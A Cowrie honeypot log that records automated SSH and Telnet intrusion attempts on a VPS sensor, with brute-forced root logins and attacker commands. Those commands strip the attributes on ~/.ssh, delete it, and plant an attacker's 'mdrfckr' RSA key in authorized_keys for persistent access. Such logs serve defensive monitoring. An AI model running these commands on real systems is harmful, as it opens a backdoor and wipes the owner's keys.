{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","sensor":"my-vps","timestamp":"2025-09-09T02:50:47.793056Z","src_ip":"139.19.117.131","session":"02f9a1396e7c"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T02:50:47.794183Z","src_ip":"139.19.117.131","session":"02f9a1396e7c"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","sensor":"my-vps","timestamp":"2025-09-09T02:50:47.812781Z","src_ip":"139.19.117.131","session":"02f9a1396e7c"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T02:50:47.813346Z","src_ip":"139.19.117.131","session":"02f9a1396e7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37466,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fe9e97609e4","protocol":"ssh","message":"New connection: 212.227.235.229:37466 (1.2.3.4:22) [session: 4fe9e97609e4]","sensor":"my-vps","timestamp":"2025-09-09T02:50:53.883946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:50:53.884830Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:50:53.963498Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test_123","message":"login attempt [root/Test_123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:50:54.322546Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:50:54.501699Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:50:54.502368Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:50:54.503467Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:50:54.583516Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:50:54.843709Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:50:54.844439Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:50:54.925505Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:50:54.926370Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37478,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2f6058425ff","protocol":"ssh","message":"New connection: 212.227.235.229:37478 (1.2.3.4:22) [session: c2f6058425ff]","sensor":"my-vps","timestamp":"2025-09-09T02:50:55.003677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:50:55.004264Z","src_ip":"212.227.235.229","session":"c2f6058425ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:50:55.083265Z","src_ip":"212.227.235.229","session":"c2f6058425ff"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:50:55.441753Z","src_ip":"212.227.235.229","session":"c2f6058425ff"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:50:56.522738Z","src_ip":"212.227.235.229","session":"c2f6058425ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37490,"dst_ip":"1.2.3.4","dst_port":22,"session":"540baabd42f0","protocol":"ssh","message":"New connection: 212.227.235.229:37490 (1.2.3.4:22) [session: 540baabd42f0]","sensor":"my-vps","timestamp":"2025-09-09T02:50:56.599772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:50:56.600670Z","src_ip":"212.227.235.229","session":"540baabd42f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:50:56.679160Z","src_ip":"212.227.235.229","session":"540baabd42f0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:50:57.037107Z","src_ip":"212.227.235.229","session":"540baabd42f0"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:50:57.117482Z","src_ip":"212.227.235.229","session":"540baabd42f0"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:50:57.118335Z","src_ip":"212.227.235.229","session":"4fe9e97609e4"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:50:57.724484Z","src_ip":"139.19.117.131","session":"02f9a1396e7c"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11826,"dst_ip":"1.2.3.4","dst_port":22,"session":"555fd7566b4d","protocol":"ssh","message":"New connection: 185.152.45.241:11826 (1.2.3.4:22) [session: 555fd7566b4d]","sensor":"my-vps","timestamp":"2025-09-09T02:51:11.650399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:51:11.668670Z","src_ip":"185.152.45.241","session":"555fd7566b4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:51:11.733724Z","src_ip":"185.152.45.241","session":"555fd7566b4d"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"www-data","message":"login attempt [www-data/www-data] failed","sensor":"my-vps","timestamp":"2025-09-09T02:51:12.020090Z","src_ip":"185.152.45.241","session":"555fd7566b4d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:51:13.074326Z","src_ip":"185.152.45.241","session":"555fd7566b4d"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.191.175","src_port":54514,"dst_ip":"1.2.3.4","dst_port":23,"session":"9cac55496073","protocol":"telnet","message":"New connection: 8.222.191.175:54514 (1.2.3.4:23) [session: 9cac55496073]","sensor":"my-vps","timestamp":"2025-09-09T02:51:35.481645Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41254,"dst_ip":"1.2.3.4","dst_port":23,"session":"d287f602808e","protocol":"telnet","message":"New connection: 212.227.235.229:41254 (1.2.3.4:23) [session: d287f602808e]","sensor":"my-vps","timestamp":"2025-09-09T02:51:43.210102Z"}
{"eventid":"cowrie.session.closed","duration":30.65124225616455,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:52:06.132819Z","src_ip":"8.222.191.175","session":"9cac55496073"}
{"eventid":"cowrie.session.closed","duration":31.295499086380005,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:52:14.505527Z","src_ip":"212.227.235.229","session":"d287f602808e"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11830,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ac29dafbcee","protocol":"ssh","message":"New connection: 185.152.45.241:11830 (1.2.3.4:22) [session: 1ac29dafbcee]","sensor":"my-vps","timestamp":"2025-09-09T02:52:26.476028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:52:26.476997Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:52:26.538058Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.login.success","username":"root","password":"newpassword#12","message":"login attempt [root/newpassword#12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:52:26.808784Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:52:26.992314Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:52:26.993226Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:52:26.995638Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:52:27.048817Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:52:27.153661Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:52:27.154468Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:52:27.213579Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:52:27.214524Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11831,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fa8fcf3e5de","protocol":"ssh","message":"New connection: 185.152.45.241:11831 (1.2.3.4:22) [session: 6fa8fcf3e5de]","sensor":"my-vps","timestamp":"2025-09-09T02:52:27.253804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:52:27.254723Z","src_ip":"185.152.45.241","session":"6fa8fcf3e5de"}
